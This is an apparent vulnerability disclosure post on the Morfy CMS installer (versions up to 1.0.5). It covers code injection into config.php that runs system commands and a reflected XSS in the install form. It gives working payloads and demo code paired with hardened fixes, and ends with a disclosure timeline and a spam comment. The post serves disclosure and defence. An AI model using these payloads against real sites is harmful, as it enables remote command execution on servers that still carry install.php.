Executing Commands like a Boss! (*cough cough*)
Morfy CMS versions <= 1.0.5 are vulnerable to the following attacks
if certain requirements are fulfilled (in both cases, install.php must still be present on the server).
1. Remote Command Execution
Vulnerable Code
./install.php Line 57
$post_site_url = isset($_POST['site_url']) ? $_POST['site_url'] : '';
./install.php Line 64-77
file_put_contents('config.php', "<?php
return array(
    'site_url'         => '{$post_site_url}',
    'site_charset'     => 'UTF-8',
    'site_timezone'    => '{$post_site_timezone}',
    'site_theme'       => 'default',
    'site_title'       => '{$post_site_title}',
    'site_description' => '{$post_site_description}',
    'site_keywords'    => '{$post_site_keywords}',
    'email'            => '{$post_email}',
    'plugins'          => array(
        'markdown',
        'sitemap',
    ),
);");
The problem is that several unsanitized user inputs are interpolated
directly into PHP source code that is then written to a configuration file (config.php).
Because the values land inside a single-quoted string literal, a single quote in the input
ends that literal and everything after it is parsed as PHP.
Exploitation: open install.php and submit the following as the site URL:
website.com}','yibelo'=>eval("system('dir');"),//
(The leading `}` is not needed, since the template's `{$post_site_url}` interpolation consumes its own braces, but it does no harm.)
This will store the following in config.php (the other entries contain whatever was submitted in the remaining fields):
<?php
return array(
    'site_url'         => 'website.com}','yibelo'=>eval("system('dir');"),//',
    'site_charset'     => 'UTF-8',
    'site_timezone'    => '<submitted timezone>',
    'site_theme'       => 'default',
    'site_title'       => '<submitted title>',
    'site_description' => '<submitted description>',
    'site_keywords'    => '<submitted keywords>',
    'email'            => '<submitted email>',
    'plugins'          => array(
        'markdown',
        'sitemap',
    ),
);
PHP reads the site_url line as two array elements, 'site_url' => 'website.com}' and 'yibelo' => eval("system('dir');"), and the trailing // comments out the leftover ',. The eval() runs every time config.php is executed, so navigating to site.com/config.php (or to any page that includes the config) runs system('dir') and displays the file listing of the current directory. On a Linux host substitute ls, or any other command, for dir.
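The following is an added example, not Morfy's own code: it reproduces the install.php template as a function, feeds it the payload above as a constructed POST array, and puts a hardened writer beside it. The fix builds the configuration as a PHP array and lets var_export() emit the literal, which escapes quotes and backslashes so the attacker's value is stored as a string rather than parsed as source. Function names and the sample values are assumptions for the demonstration.

```php
<?php
// Added example (not Morfy's code). install.php interpolates POST values
// straight into PHP source; a site_url of
//   website.com}','yibelo'=>eval("system('dir');"),//
// closes the string literal and appends an array element that is
// evaluated every time config.php is included.

// Constructed sample POST body, as the attacker would submit it.
$post = [
    'site_url'         => 'website.com}\',\'yibelo\'=>eval("system(\'dir\');"),//',
    'site_timezone'    => 'UTC',
    'site_title'       => 'Demo',
    'site_description' => '',
    'site_keywords'    => '',
    'email'            => 'admin@example.com',
];

// Vulnerable writer, equivalent to install.php lines 64-77 (shortened).
function render_config_vulnerable(array $p): string
{
    return "<?php\nreturn array(\n"
         . "    'site_url' => '{$p['site_url']}',\n"
         . "    'site_timezone' => '{$p['site_timezone']}',\n"
         . "    'site_title' => '{$p['site_title']}',\n"
         . "    'email' => '{$p['email']}',\n"
         . ");\n";
}

// Hardened writer: assemble the config as data, then let var_export()
// produce a valid PHP literal. Quotes and backslashes inside values are
// escaped, so the payload above stays an inert string.
function render_config_safe(array $p): string
{
    $config = [
        'site_url'         => (string) ($p['site_url'] ?? ''),
        'site_charset'     => 'UTF-8',
        'site_timezone'    => (string) ($p['site_timezone'] ?? 'UTC'),
        'site_theme'       => 'default',
        'site_title'       => (string) ($p['site_title'] ?? ''),
        'site_description' => (string) ($p['site_description'] ?? ''),
        'site_keywords'    => (string) ($p['site_keywords'] ?? ''),
        'email'            => (string) ($p['email'] ?? ''),
        'plugins'          => ['markdown', 'sitemap'],
    ];
    return "<?php\nreturn " . var_export($config, true) . ";\n";
}

echo "--- vulnerable config.php ---\n", render_config_vulnerable($post);
echo "--- hardened config.php ---\n", render_config_safe($post);
```

In the vulnerable output the site_url line contains a second array element with an eval() call; in the hardened output the same value appears as one quoted string with every embedded single quote escaped as \'. Validating site_url with filter_var($value, FILTER_VALIDATE_URL) before writing is a sensible extra check, but the escaping, not the validation, is what makes the file safe to include.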
2. Cross Site Scripting
Vulnerable Code
./install.php Line 14
$site_url = 'http://'.$_SERVER["SERVER_NAME"].$port.str_replace(array("index.php", "install.php"), "", $_SERVER['PHP_SELF']);
./install.php Line 20
$rewrite_base = str_replace(array("index.php", "install.php"), "", $_SERVER['PHP_SELF']);
./install.php Line 226
<input type="text" name="site_url" class="form-control" id="site_url" placeholder="Enter Site Url" value="<?php echo $site_url; ?>">
Exploitation
$_SERVER['PHP_SELF'] includes any path info the client appends after install.php, and the value is echoed into the form without escaping. Send a GET request carrying a payload in the path like
(the payload itself is missing from this page)
This will output
<input type="text" name="site_url" class="form-control" id="site_url" placeholder="Enter Site Url" value=""><svg/onload=confirm(1)>
and a reflected XSS fires as long as install.php has not been removed.
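As an added example (not Morfy's code), the snippet below rebuilds the line-14 derivation as a function, runs it against constructed $_SERVER values for a request to /install.php/"><svg/onload=confirm(1)>, and shows the two changes that close the hole: deriving the base path from $_SERVER['SCRIPT_NAME'], which never contains client-supplied path info, and escaping the value with htmlspecialchars() before it goes into the attribute. The $port variable from line 14 is omitted, and the request values are assumptions.

```php
<?php
// Added example, not Morfy's code. PHP_SELF is SCRIPT_NAME plus whatever
// PATH_INFO the client appends, so for a request to
//   /install.php/"><svg/onload=confirm(1)>
// it carries the payload, which install.php echoes into the form unescaped.

// Constructed $_SERVER values for that request (the $port part is omitted).
$server = [
    'SERVER_NAME' => 'site.com',
    'PHP_SELF'    => '/install.php/"><svg/onload=confirm(1)>',
    'SCRIPT_NAME' => '/install.php',
];

// Equivalent to install.php line 14: strips the file name but keeps PATH_INFO.
function site_url_vulnerable(array $s): string
{
    return 'http://' . $s['SERVER_NAME']
         . str_replace(['index.php', 'install.php'], '', $s['PHP_SELF']);
}

// Hardened: SCRIPT_NAME holds only the script's own path, and dirname()
// drops the file name without any string replacement.
function site_url_safe(array $s): string
{
    return 'http://' . $s['SERVER_NAME']
         . rtrim(dirname($s['SCRIPT_NAME']), '/\\') . '/';
}

// Output must be attribute-escaped regardless of where the value came from.
function site_url_input(string $value, bool $escape): string
{
    $v = $escape
        ? htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        : $value;
    return '<input type="text" name="site_url" id="site_url" value="' . $v . '">';
}

// 1. Vulnerable derivation, unescaped: the payload closes the attribute.
echo site_url_input(site_url_vulnerable($server), false), "\n";
// 2. Same value escaped: quotes and angle brackets become entities.
echo site_url_input(site_url_vulnerable($server), true), "\n";
// 3. Safe derivation: the path info never reaches the page at all.
echo site_url_input(site_url_safe($server), true), "\n";
```

Run it with the PHP CLI; the first line reproduces the broken markup from the advisory, the second keeps the attacker's text but as inert text inside the attribute, and the third contains only http://site.com/. Escaping on output is the part that must never be skipped, since any other value that reaches the template (a stored site_url, for instance) takes the same path.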
Vulnerable? The easiest fix (for both issues) is to delete install.php the moment you have finished installing Morfy; the installer is the only place both bugs live. A code-level fix would escape the submitted values before writing them into config.php and before echoing them into the form.
Another one for the f*** sakes!
2014-10-12 – Contacted Developers (no reply)
2014-11-00 – Another attempt to contact developers (no
reply)
2014-12-17 – Public Disclosure.
Good one! I need this PHP configuration file to understand how to fix this issue. Here I get actual info which resolves my problem. Best Event Application iPhone